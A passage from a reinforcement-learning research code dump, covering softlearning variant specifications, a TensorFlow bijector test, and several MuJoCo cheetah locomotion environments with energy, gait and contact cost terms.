# 'xml_file': 'full_cheetah_heavyv3.xml',
# "soft_gait_penalty_weight": 1,
# "soft_gait_target": 0.25,
# "soft_gait_target2": 0.75,
# },
},
'FullCheetah': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
'SymlossG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle":"gallop"
},
'SymdupG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop"
},
'SymlossT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot"
},
'SymdupT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot"
},
'SymlossGfblr-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallopFBLR"
},
'SymdupGfblr-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallopFBLR"
},
},
'AntRun': { # 6 DoF
'Energy0-v0': {
'terminate_when_unhealthy': False, ##
'energy_weights': 0,
},
},
'AntSquaT': { # 6 DoF
'Energy0-v0': {
'ctrl_cost_weight' : 0.1, ##0.1
'horizontal_weight' : 1, ##
'contact_cost_weight' : 0.005, ##5e-4
'distance_weigth' : 5,
'terminate_when_unhealthy':False,##
'energy_weights': 0,
},
},
'AntSquaTRedundant': { # 6 DoF
'Energy0-v0': {
'ctrl_cost_weight' : 0.1, ##0.1
'horizontal_weight' : 10, ##
'contact_cost_weight' : 0.1, ##5e-4
'distance_weigth' : 10,
'terminate_when_unhealthy':False,##
'energy_weights': 0,
},
},
}
NUM_CHECKPOINTS = 10
def get_variant_spec_base(universe, domain, task, policy, algorithm,epoch_length,num_epoch,actor_size=256,critic_size=256,
n_layer=2):
if num_epoch is not None:
ALGORITHM_PARAMS_PER_DOMAIN[domain]['kwargs']['n_epochs']=num_epoch
algorithm_params = deep_update(
ALGORITHM_PARAMS_BASE,
ALGORITHM_PARAMS_PER_DOMAIN.get(domain, {})
)
ALGORITHM_PARAMS_ADDITIONAL[algorithm]['kwargs']['epoch_length']=epoch_length
nl=[]
for i in range(n_layer):
nl.append(actor_size)
POLICY_PARAMS_BASE[policy]['kwargs']['hidden_layer_sizes']=tuple(nl)
#POLICY_PARAMS_BASE[policy]['kwargs']['hidden_layer_sizes']=(actor_size,actor_size)
algorithm_params = deep_update(
algorithm_params,
ALGORITHM_PARAMS_ADDITIONAL.get(algorithm, {})
)
print(algorithm_params)
env_param = ENV_PARAMS.get(domain, {}).get(task, {})
variant_spec = {
'domain': domain,
'task': task,
'universe': universe,
'env_params':env_param ,
'policy_params': deep_update(
POLICY_PARAMS_BASE[policy],
POLICY_PARAMS_FOR_DOMAIN[policy].get(domain, {})
),
'Q_params': {
'type': 'double_feedforward_Q_function',
'kwargs': {
'hidden_layer_sizes': (critic_size,critic_size),#256
}
},
'algorithm_params': algorithm_params,
'replay_pool_params': {
'type': 'SimpleReplayPool',
'kwargs': {
'max_size': tune.sample_from(lambda spec: (
{
'SimpleReplayPool': int(1e6),
'TrajectoryReplayPool': int(1e4),
}.get(
spec.get('config', spec)
['replay_pool_params']
['type'],
int(1e6))
)),
}
},
'sampler_params': {
'type': 'SimpleSampler',
'kwargs': {
'max_path_length': MAX_PATH_LENGTH_PER_DOMAIN.get(
domain, epoch_length),#DEFAULT_MAX_PATH_LENGTH
'min_pool_size': MAX_PATH_LENGTH_PER_DOMAIN.get(
domain, DEFAULT_MAX_PATH_LENGTH),
'batch_size': 256,
}
},
'run_params': {
'seed': tune.sample_from(
lambda spec: np.random.randint(0, 10000)),
'checkpoint_at_end': True,
'checkpoint_frequency': NUM_EPOCHS_PER_DOMAIN.get(
domain, DEFAULT_NUM_EPOCHS) // NUM_CHECKPOINTS,
'checkpoint_replay_pool': False,
},
}
return variant_spec
def get_variant_spec_image(universe,
domain,
task,
policy,
algorithm,
*args,
**kwargs):
variant_spec = get_variant_spec_base(
universe, domain, task, policy, algorithm, *args, **kwargs)
if 'image' in task.lower() or 'image' in domain.lower():
preprocessor_params = {
'type': 'convnet_preprocessor',
'kwargs': {
'image_shape': variant_spec['env_params']['image_shape'],
'output_size': M,
'conv_filters': (4, 4),
'conv_kernel_sizes': ((3, 3), (3, 3)),
'pool_type': 'MaxPool2D',
'pool_sizes': ((2, 2), (2, 2)),
'pool_strides': (2, 2),
'dense_hidden_layer_sizes': (),
},
}
variant_spec['policy_params']['kwargs']['preprocessor_params'] = (
preprocessor_params.copy())
variant_spec['Q_params']['kwargs']['preprocessor_params'] = (
preprocessor_params.copy())
return variant_spec
def get_variant_spec(args):
universe, domain, task = args.universe, args.domain, args.task
if ('image' in task.lower()
or 'blind' in task.lower()
or 'image' in domain.lower()):
variant_spec = get_variant_spec_image(
universe, domain, task, args.policy, args.algorithm)
else:
variant_spec = get_variant_spec_base(
universe, domain, task, args.policy, args.algorithm,args.epoch_length,args.total_epoch,args.actor_size,
args.critic_size,n_layer=args.n_layer)
if args.checkpoint_replay_pool is not None:
variant_spec['run_params']['checkpoint_replay_pool'] = (
args.checkpoint_replay_pool)
return variant_spec
```
#### File: distributions/bijectors/conditional_scale_test.py
```python
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
from softlearning.distributions import bijectors
from softlearning.internal import test_util
@test_util.test_all_tf_execution_regimes
class ScaleBijectorTest(test_util.TestCase, parameterized.TestCase):
"""Tests correctness of the Y = scale @ x transformation."""
def testName(self):
bijector = bijectors.ConditionalScale()
self.assertStartsWith(bijector.name, 'conditional_scale')
@parameterized.named_parameters(
dict(testcase_name='static_float32', is_static=True, dtype=np.float32),
dict(testcase_name='static_float64', is_static=True, dtype=np.float64),
dict(testcase_name='dynamic_float32', is_static=False, dtype=np.float32),
dict(testcase_name='dynamic_float64', is_static=False, dtype=np.float64),
)
def testNoBatchScale(self, is_static, dtype):
scale = dtype(2.0)
bijector = bijectors.ConditionalScale(dtype=dtype)
x = self.maybe_static(np.array([1., 2, 3], dtype), is_static)
self.assertAllClose([2., 4, 6], bijector.forward(x, scale=scale))
self.assertAllClose([.5, 1, 1.5], bijector.inverse(x, scale=scale))
self.assertAllClose(
-np.log(2.),
bijector.inverse_log_det_jacobian(x, scale=scale, event_ndims=0))
@parameterized.named_parameters(
dict(testcase_name='static_float32', is_static=True, dtype=np.float32),
dict(testcase_name='static_float64', is_static=True, dtype=np.float64),
dict(testcase_name='dynamic_float32', is_static=False, dtype=np.float32),
dict(testcase_name='dynamic_float64', is_static=False, dtype=np.float64),
)
def testBatchScale(self, is_static, dtype):
# Batched scale
scale = tf.constant([2., 3.], dtype=dtype)
bijector = bijectors.ConditionalScale(dtype=dtype)
x = self.maybe_static(np.array([1.], dtype=dtype), is_static)
self.assertAllClose([2., 3.], bijector.forward(x, scale=scale))
self.assertAllClose([0.5, 1./3.], bijector.inverse(x, scale=scale))
self.assertAllClose(
[-np.log(2.), -np.log(3.)],
bijector.inverse_log_det_jacobian(x, scale=scale, event_ndims=0))
if __name__ == '__main__':
tf.test.main()
```
#### File: gym/mujoco/half_cheetah.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
from .mirror_utils import convert_to_mirror_list,MIRROR_DICTS
from collections import deque
DEFAULT_CAMERA_CONFIG = {
'distance': 4.0,
}
"""
0 rootz slider C
1 rooty hinge C
2 bthigh hinge L
3 bshin hinge L
4 bfoot hinge L
5 fthigh hinge R
6 fshin hinge R
7 ffoot hinge R
8 rootx slider C
9 rootz slider C
10 rooty hinge C
11 bthigh hinge L
12 bshin hinge L
13 bfoot hinge L
14 fthigh hinge R
15 fshin hinge R
16 ffoot hinge R
"""
class HalfCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.mirror_inds=MIRROR_DICTS["HalfCheetah"]
self.mirror_lists=convert_to_mirror_list(self.mirror_inds)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahHeavyEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_heavy.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class FullCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='full_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
contact_cost_weight=0, ##5e-4
contact_force_range=(-1.0, 1.0),
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
walkstyle="",#"gallop" "trot"
energy_weights=0.,
phase_delay=0,
soft_gait_penalty_weight=0,
soft_gait_target=0,
soft_gait_target2=0,
speed=0):
utils.EzPickle.__init__(**locals())
self.speed=speed
self._forward_reward_weight = forward_reward_weight
self.soft_gait_penalty_weight=soft_gait_penalty_weight
self.soft_gait_target=soft_gait_target
self.soft_gait_target2=soft_gait_target2
self.joint_list=['bthighL','bshinL','bfootL','fthighL','fshinL','ffootL',
'bthighR', 'bshinR', 'bfootR', 'fthighR', 'fshinR', 'ffootR']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._contact_cost_weight = contact_cost_weight
self._contact_force_range = contact_force_range
self.phase_delay=phase_delay
if self.phase_delay!=0:
self.delay_deque=deque(maxlen=self.phase_delay)
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.walkstyle=walkstyle
mykey="FullCheetah_"+walkstyle
self.agent=mykey
self.mirror_lr_inds=MIRROR_DICTS["FullCheetah_lr"]
self.mirror_lr_lists=convert_to_mirror_list(self.mirror_lr_inds)
self.mirror_fb_inds=MIRROR_DICTS["FullCheetah_fb"]
self.mirror_fb_lists=convert_to_mirror_list(self.mirror_fb_inds)
self.contact={
"BL":[],
"FL": [],
"BR": [],
"FR": [],
}
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def contact_forces(self):
raw_contact_forces = self.sim.data.cfrc_ext
min_value, max_value = self._contact_force_range
contact_forces = np.clip(raw_contact_forces, min_value, max_value)
return contact_forces
def contact_cost(self):
contact_cost = np.sum(np.square(self.contact_forces()))
return self._contact_cost_weight *contact_cost
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def gait_cost(self,action):
gait_cost=0
if self.walkstyle=="gallop":
gait_cost=np.abs(np.sum(np.abs(action[6:12] - action[0:6]))-self.soft_gait_target)
elif self.walkstyle == "gallop2":
gait_cost=np.abs(np.sum(np.abs(action[6:9] - action[0:3]))-self.soft_gait_target)+\
np.abs(np.sum(np.abs(action[9:12] - action[3:6]))-self.soft_gait_target2)
elif self.walkstyle == "trot":
gait_cost=np.abs(np.sum(np.abs(action[6:9] +action[0:3]))
+np.sum(np.abs(action[9:12] +action[3:6]))-self.soft_gait_target)
return self.soft_gait_penalty_weight *gait_cost
def step(self, action):
if self.soft_gait_penalty_weight==0:
if self._contact_cost_weight==0 and self.walkstyle=="gallop":
if self.phase_delay!=0 and len(self.delay_deque)==self.phase_delay:
action[6:12] = self.delay_deque[0]
else:
action[6:12] = action[0:6] # Right equals left
if self.phase_delay != 0:
self.delay_deque.append((action[0:6]))
elif self.walkstyle=="trot":
action[6:9] = -1*action[0:3]#bR equals negative bL
action[9:12] = -1 * action[3:6] # fR equals negative fL
elif self.walkstyle == "trotv2":
action[9:12] = action[0:3] # fR equals bL
action[6:9] = action[3:6] # bR equals fL
# self.contact["BL"].append(0)
# self.contact["FL"].append(0)
# self.contact["BR"].append(0)
# self.contact["FR"].append(0)
#
# for contactnum in range(self.data.ncon):
# c=self.data.contact[contactnum]
# if c.dist!=0:
# cur_g = c.geom2
# if cur_g == 8:
# self.contact["BL"][-1]=1
# #print("BL")
# elif cur_g == 11:
# self.contact["FL"][-1] = 1
# #print("FL")
# elif cur_g == 14:
# self.contact["BR"][-1] = 1
# #print("BR")
# elif cur_g == 17:
# #print("FR")
# self.contact["FR"][-1] = 1
#
# if len(self.contact["BL"])>500:
# print("SAVE gait!")
# #name="gallop_200_s5r5"
# name = "RealFCT_v1r1"
# np.save('../gait_info/' + name, self.contact)
# quit()
#print(self.data.contact[0].geom2)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
if self.speed != 0:
delta_speed=-abs(x_velocity-self.speed) #negative as we want to minimize this delta
x_velocity=delta_speed
ctrl_cost = self.control_cost(action)
contact_cost = self.contact_cost()
gait_cost = self.gait_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost - contact_cost- gait_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'reward_contact': -contact_cost,
'reward_gait': -gait_cost,
'ori_reward':forward_reward-ctrl_cost -contact_cost-gait_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dof.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv2(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv2.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bshin','bfoot','fthigh', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bshin','bfoot', 'fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
